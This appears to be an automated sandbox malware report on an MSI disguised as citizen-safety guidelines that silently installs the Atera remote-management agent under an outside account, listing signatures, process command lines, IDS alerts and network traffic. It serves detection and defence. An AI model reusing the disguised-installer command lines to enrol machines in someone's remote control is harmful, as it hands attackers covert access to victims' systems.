Windows Analysis Report
Guidelines_for_Citizen_Safety.msi

Overview

General Information

Sample name: Guidelines_for_Citizen_Safety.msi
Analysis ID: 1561804
MD5: b5b7dd5400c36976c4870af2f1e888a0
SHA1: dbd6fa30f976baf529d2005d68804ea92327e9bc
SHA256: fd000e4dbd1e3ce1c3604fa0d5ffe235ee676eb2c5af6ce7334ac69312456708
Tags: msi, user-JAMESWT_MHT
Infos:

Detection

AteraAgent
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7620 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7708 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7784 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7832 cmdline: rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7892 cmdline: rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8000 cmdline: rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 4308 cmdline: rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8084 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8120 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8168 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 7172 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 7400 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2" MD5: 477293F80461713D51A98A24023D45E8)
  • AteraAgent.exe (PID: 6216 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 7020 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 5852 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7332 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 6992 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB MD5: FD9DF72620BCA7C4D48BC105C89DFFD2)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Windows\Temp\~DFE1D8FD4611557514.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DFD5E723F7AA2005AD.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DF9340E6CB357EA061.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000F.00000002.2637180822.0000018896E70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000D.00000002.1539508523.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000F.00000002.2637942103.00000188970C0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
00000019.00000002.2390295578.0000020EC378B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
13.0.AteraAgent.exe.158ec7a0000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
19.2.AgentPackageAgentInformation.exe.2ac50640000.1.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8084, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8120, ProcessName: net.exe
Source: Process started, Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8084, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8120, ProcessName: net.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T11:15:47.493085+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49779 | 13.232.67.198 | 443 | TCP
2024-11-24T11:15:50.876702+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49793 | 13.232.67.198 | 443 | TCP
2024-11-24T11:16:35.988034+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49900 | 13.232.67.198 | 443 | TCP
2024-11-24T11:16:46.853352+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49931 | 13.232.67.198 | 443 | TCP
2024-11-24T11:16:53.737792+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49952 | 13.232.67.198 | 443 | TCP
2024-11-24T11:16:59.756818+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49971 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:02.925774+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49980 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:10.758598+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50009 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:16.730669+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50034 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:22.259491+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50053 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:26.300090+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50066 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:30.206941+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50078 | 13.232.67.198 | 443 | TCP
2024-11-24T11:17:35.554306+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 50083 | 13.232.67.198 | 443 | TCP

                              AV Detection

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, ReversingLabs: Detection: 26%
Source: Guidelines_for_Citizen_Safety.msi, ReversingLabs: Detection: 28%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 92.6% probability
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, File created: C:\Windows\system32\InstallUtil.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 108.158.75.93:443 -> 192.168.2.7:49796 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49932 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49963 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49988 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50009 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50014 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50015 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50023 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50031 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50069 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50073 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50078 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exe, File opened: z:
Source: C:\Windows\System32\msiexec.exe, File opened: x:
Source: C:\Windows\System32\msiexec.exe, File opened: v:
Source: C:\Windows\System32\msiexec.exe, File opened: t:
Source: C:\Windows\System32\msiexec.exe, File opened: r:
Source: C:\Windows\System32\msiexec.exe, File opened: p:
Source: C:\Windows\System32\msiexec.exe, File opened: n:
Source: C:\Windows\System32\msiexec.exe, File opened: l:
Source: C:\Windows\System32\msiexec.exe, File opened: j:
Source: C:\Windows\System32\msiexec.exe, File opened: h:
Source: C:\Windows\System32\msiexec.exe, File opened: f:
Source: C:\Windows\System32\msiexec.exe, File opened: b:
Source: C:\Windows\System32\msiexec.exe, File opened: y:
Source: C:\Windows\System32\msiexec.exe, File opened: w:
Source: C:\Windows\System32\msiexec.exe, File opened: u:
Source: C:\Windows\System32\msiexec.exe, File opened: s:
Source: C:\Windows\System32\msiexec.exe, File opened: q:
Source: C:\Windows\System32\msiexec.exe, File opened: o:
Source: C:\Windows\System32\msiexec.exe, File opened: m:
Source: C:\Windows\System32\msiexec.exe, File opened: k:
Source: C:\Windows\System32\msiexec.exe, File opened: i:
Source: C:\Windows\System32\msiexec.exe, File opened: g:
Source: C:\Windows\System32\msiexec.exe, File opened: e:
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, File opened: c:
Source: C:\Windows\System32\msiexec.exe, File opened: a:
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451873h13_2_00007FFAAB45172D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451FFFh13_2_00007FFAAB451FAC
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB451A44h13_2_00007FFAAB451A34
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461873h15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461A44h15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461FFFh15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB46227Bh15_2_00007FFAAB460C58
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB464ECBh15_2_00007FFAAB464C41
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB47B972h15_2_00007FFAAB47B5E7
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB464ECBh15_2_00007FFAAB464DC8
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB461FFFh15_2_00007FFAAB461EB6
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB47B972h15_2_00007FFAAB47B620
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB6861F3h15_2_00007FFAAB68609D
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB68681Eh15_2_00007FFAAB686765
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB686CFCh15_2_00007FFAAB686765
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax15_2_00007FFAAB686263

                              Networking

                              Source: Yara matchFile source: 19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b225017a-a518-407e-ba60-89916d0db242&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bf4acf61-3ccb-481c-8428-f2b8078e60c9&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ec94d306-e989-460d-a2a2-e676241f4153&tr=31&tt=17324433440942418&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=97a3c5c1-3b53-4697-9042-014f3710a368&tr=31&tt=17324433474018542&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ad2d8efb-91cb-408c-a084-3f507796640e&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation.zip?7eC/6UeVMT2yOja7rugNNkxRTCpJ1tREDX7f6JkZ3OlpG2NJMgnOjIB/dqEJPBcv HTTP/1.1Host: ps.atera.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=19414362-703b-464a-b6c7-07f45d92c533&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c6f3c309-b378-4eb6-be20-6f03325c221f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=b22252c6-c37c-49ec-8023-03bf78fe353a&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3f74bb1-6c6f-4d46-bcd1-dababeae95b1&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9d2bb483-a1d5-41c5-b567-c3f48ab6ed2c&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=618f72e2-0dcf-4d40-b59c-d773fc1ae2ba&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=9cb19796-6c2e-41ce-9126-598ecc9d33d5&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bb33ca5-3446-47a7-8747-dbbe274b3fa8&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=fe727902-1ef3-4552-afad-6178afa6c12c&tr=31&tt=17324434035400814&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2a252f8a-196a-412e-bfc9-292322230586&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=4097a231-6804-42b7-a1c1-b63735fd2c43&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f5557641-16d5-42d0-befc-2c3fa49ec144&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bdd8f068-e461-49d2-bf76-5496f217f86a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c2794a63-4cce-452a-a323-b26bf4d17cfd&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
